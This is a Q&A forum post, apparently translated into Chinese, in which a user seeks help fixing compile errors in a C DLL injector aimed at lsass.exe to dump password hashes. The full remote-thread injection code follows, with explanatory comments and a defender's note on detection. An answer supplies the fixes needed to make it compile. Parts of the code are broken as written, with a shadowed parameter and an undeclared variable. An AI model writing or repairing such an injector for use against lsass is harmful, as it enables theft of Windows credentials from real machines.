
嘿,我试图注入一个DLL进入一个进程,即lsass.exe获取哈希。它有点hacky,但不能帮助我的项目。 我有dll注入的代码,但在Visual C++它给错误,如..使用C的dll注入

在 TEXT(“LoadLibraryA”) 处 ---->>> 参数类型 “常量 WCHAR” 与 LPCSTR 不相容

在 lpFuncAddr 处 ----------->>> 参数类型 “LPVOID” 与参数类型 “LPTHREAD_START_ROUTINE” 不相容

CODE:

/*
 * InjectDLL - load a DLL into another process by remote thread.
 *
 * Mechanism as written: open the target with memory-write and thread-create
 * rights, allocate a buffer in it, copy the DLL path in, then start a remote
 * thread whose entry point is kernel32!LoadLibraryA with that buffer as its
 * argument. Every acquired resource (process handle, remote buffer, module
 * handle, thread handle) is released on the path that acquired it.
 *
 * dwProcessId  - PID of the target process.
 * lpszDLLPath  - narrow path of the DLL to load (parameter is shadowed below).
 * Returns TRUE only if the remote thread ran and returned a non-zero exit code
 * (the HMODULE LoadLibraryA returns); FALSE on any failure, with no error detail.
 *
 * Defender's note: the access mask requested from OpenProcess together with
 * CreateRemoteThread into a sensitive process is the canonical "remote thread
 * injection" pattern that endpoint telemetry (e.g. Sysmon process-access and
 * create-remote-thread events) is built to flag, and LSA protection (RunAsPPL)
 * is designed to deny exactly this kind of handle to lsass.
 */
BOOL InjectDLL(DWORD dwProcessId, LPCSTR lpszDLLPath) 
{ 
    HANDLE hProcess, hThread; 
    LPVOID lpBaseAddr, lpFuncAddr; 
    DWORD dwMemSize, dwExitCode; 
    BOOL bSuccess = FALSE; 
    HMODULE hUserDLL; 


    //convert char to wchar 
    // NOTE(review): this local redeclares the lpszDLLPath parameter, and `orig`
    // is not declared anywhere in this function — both are compile errors as-is.
    char *lpszDLLPath = "hash.dll"; 
      size_t origsize = strlen(orig) + 1; 
      const size_t newsize = 100; 
      size_t convertedChars = 0; 
      wchar_t dllpath[newsize]; 
      mbstowcs_s(&convertedChars, dllpath, origsize, orig, _TRUNCATE); 

    // Rights requested: create thread, query, VM operate/write/read. This is the
    // access mask that process-access monitoring keys on; it needs the caller to
    // hold sufficient privilege over the target (SeDebugPrivilege for system
    // processes).
    if((hProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION|PROCESS_VM_OPERATION 
     |PROCESS_VM_WRITE|PROCESS_VM_READ, FALSE, dwProcessId))) 
    { 
     // Length of the wide string in characters, plus terminator.
     dwMemSize = wcslen(dllpath) + 1; 
     // Committed read/write page in the target that will hold the path string.
     if((lpBaseAddr = VirtualAllocEx(hProcess, NULL, dwMemSize, MEM_COMMIT, PAGE_READWRITE))) 
     { 
      // Copies dwMemSize bytes from the narrow lpszDLLPath into the remote buffer.
      if(WriteProcessMemory(hProcess, lpBaseAddr, lpszDLLPath, dwMemSize, NULL)) 
      { 
       // kernel32 is loaded at the same base in every process of a session, so
       // the local address of LoadLibraryA is assumed valid in the target.
       if((hUserDLL = LoadLibrary(TEXT("kernel32.dll")))) 
       { 
        // TEXT() yields a wide literal under UNICODE; GetProcAddress takes LPCSTR
        // (this is the first compile error reported in the question).
        if((lpFuncAddr = GetProcAddress(hUserDLL, TEXT("LoadLibraryA")))) 
        { 
         // lpFuncAddr is LPVOID; the parameter is LPTHREAD_START_ROUTINE (second
         // compile error). The remote buffer address is passed as the thread arg.
         if((hThread = CreateRemoteThread(hProcess, NULL, 0, lpFuncAddr, lpBaseAddr, 0, NULL))) 
         { 
          // Block until the remote LoadLibrary call returns, then read its result.
          WaitForSingleObject(hThread, INFINITE); 
          if(GetExitCodeThread(hThread, &dwExitCode)) { 
           // LoadLibraryA returns NULL on failure; any non-zero value counts as success.
           bSuccess = (dwExitCode != 0) ? TRUE : FALSE; 
          } 
          CloseHandle(hThread); 
         } 
        } 
        FreeLibrary(hUserDLL); 
       } 
      } 
      // Release the remote buffer regardless of whether the thread succeeded.
      VirtualFreeEx(hProcess, lpBaseAddr, 0, MEM_RELEASE); 
     } 
     CloseHandle(hProcess); 
    } 
    return bSuccess; 
} 

/*
 * WinMain - GUI entry point: attempts one injection and reports the outcome
 * in a message box. Always returns 0 regardless of success.
 *
 * PROCESSID is not defined on this page; assumed to be a macro or constant
 * declared elsewhere — confirm. The failure branch carries no reason (InjectDLL
 * returns only a BOOL), so GetLastError() is never surfaced to the user.
 */
int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow) 
{ 
    if(InjectDLL(PROCESSID, "hash.dll")) { 
     MessageBox(NULL, TEXT("DLL Injected!"), TEXT("DLL Injector"), MB_OK); 
    }else { 
     MessageBox(NULL, TEXT("Couldn't inject DLL"), TEXT("DLL Injector"), MB_OK | MB_ICONERROR); 
    } 

    return 0; 
} 

我是 DLL 和 Windows 编程方面的初学者，非常感谢您的帮助。

回答


看起来你调用的函数期望的是 LPCSTR 而不是 LPCTSTR。去掉 TEXT() 宏就应该没问题了。

对于第二个错误，你应该可以通过一次简单的强制类型转换把 lpFuncAddr 转换为 LPTHREAD_START_ROUTINE：

if((hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpFuncAddr, lpBaseAddr, 0, NULL))) 

谢谢，我试试看 – AJINKYA 2011-01-10 17:49:10